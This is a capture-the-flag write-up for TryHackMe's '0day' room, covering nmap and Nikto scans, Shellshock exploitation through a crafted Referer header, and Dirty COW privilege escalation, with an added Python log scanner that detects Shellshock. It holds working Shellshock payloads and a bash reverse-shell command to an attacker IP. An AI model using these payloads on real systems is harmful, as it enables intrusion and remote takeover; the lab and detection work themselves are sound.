0day-TryHackMe

 

This is the write-up for the room named 0day on TryHackMe.

The room can be found here :- https://tryhackme.com/room/0day

Details given:

Exploit Ubuntu, like a Turtle in a Hurricane. Root my secure Website, take a step into the history of hacking.

What is required?:

user.txt and root.txt

Enumeration

NMAP:

As always, let's start by scanning the target with the IP given:

nmap -sC -sV 10.10.119.34 


We have port 22 (SSH) and port 80 (web) open with the above versions. Let's enumerate port 80 further using Nikto.

NIKTO:

nikto -h 10.10.119.34







The above Nikto scan reveals that this box is vulnerable to Shellshock. This is a very famous bug in bash, and according to Wikipedia (https://en.wikipedia.org/wiki/Shellshock_(software_bug)):

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.

The Nikto scan also revealed a few interesting web directories such as /admin, /backup and /secret. Let's keep those in mind; if required, we can come back to these directories later for further enumeration.

We can use cURL to enumerate further and test whether the target is actually vulnerable to Shellshock.

SHELLSHOCK:

curl http://10.10.119.34/cgi-bin/test.cgi -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id; exit"

This outputs www-data as the user, confirming that the target is exploitable using Shellshock.
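From the defender's side, the request above leaves a clear trace: the Referer header is written to the Apache access log, so the bash function-definition prefix "() {" can be searched for there. The following is an added example, not part of the original write-up. It assumes the server logs in Apache "combined" format (headers that format does not record, such as Cookie, are invisible to this check), and the sample log lines and client addresses are constructed.

```python
import re

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'\d{3} \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# A bash function definition, "() {", inside a client-supplied value is the Shellshock marker.
FUNC_DEF = re.compile(r'\(\)\s*\{')

# Constructed sample log; addresses are documentation ranges, not taken from the write-up.
SAMPLE_LOG = r'''
192.0.2.10 - - [01/Jan/2021:10:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 31 "() { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id; exit" "curl/7.68.0"
192.0.2.10 - - [01/Jan/2021:10:00:05 +0000] "GET /admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [01/Jan/2021:10:01:00 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { :; }; /bin/true"
198.51.100.7 - - [01/Jan/2021:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "http://example.com/f()" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2021:10:03:00 +0000] "GET /cgi-bin/test.cgi" 400 0 () { :;}; /bin/true
'''.strip().splitlines()


def find_shellshock(lines):
    """Return a finding for every log line that carries a function-definition prefix."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        line = line.strip()
        m = COMBINED.match(line)
        if m:
            fields = [f for f in ("request", "referer", "agent")
                      if FUNC_DEF.search(m.group(f))]
            parts = m.group("request").split()
            path = parts[1] if len(parts) > 1 else ""
        else:
            # Do not skip lines the parser rejects: scan them whole so a
            # malformed entry cannot hide a payload.
            fields = ["raw"] if FUNC_DEF.search(line) else []
            path = ""
        if fields:
            findings.append({"line": lineno, "host": line.split(" ", 1)[0],
                             "path": path, "fields": fields})
    return findings


if __name__ == "__main__":
    for f in find_shellshock(SAMPLE_LOG):
        where = f["path"] or "(unparsed)"
        print(f"line {f['line']}: {f['host']} {where} in {', '.join(f['fields'])}")
```

A hit on a /cgi-bin/ path deserves the most attention, because CGI is where header values reach bash as environment variables.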

Exploit

SHELLSHOCK:
Let's exploit Shellshock and get a reverse shell using the following command:

curl -v http://10.10.119.34/cgi-bin/test.cgi -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /bin/bash -i >& /dev/tcp/10.8.98.192/9999 0>&1"

We get our reverse shell and thus our user flag in ryan's home directory :- THM{Sh********_*****}

Privilege Escalation

DIRTY COW:

Use Linux Exploit Suggester from https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh, which suggests that the box is vulnerable to the dirtyc0w vulnerability.





Again, this is a very famous vulnerability; read more details about it here :- https://dirtycow.ninja/

This can be used to do privilege escalation and a working exploit is available here which worked for this box: https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679

The target is an x64 machine and we faced problems compiling the exploit on the target.

www-data@ubuntu:/tmp cat /proc/version
cat /proc/version
Linux version 3.13.0-32-generic (buildd@kissel) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014

So compile the exploit locally on Kali and transfer it to the target.

┌──(kali㉿kali)-[/opt/tools/exploits]
└─$ gcc cowroot.c -o cowroot -pthread

Running ./cowroot on the target gives us a root shell and the root flag in /root :- THM{g00d********************}
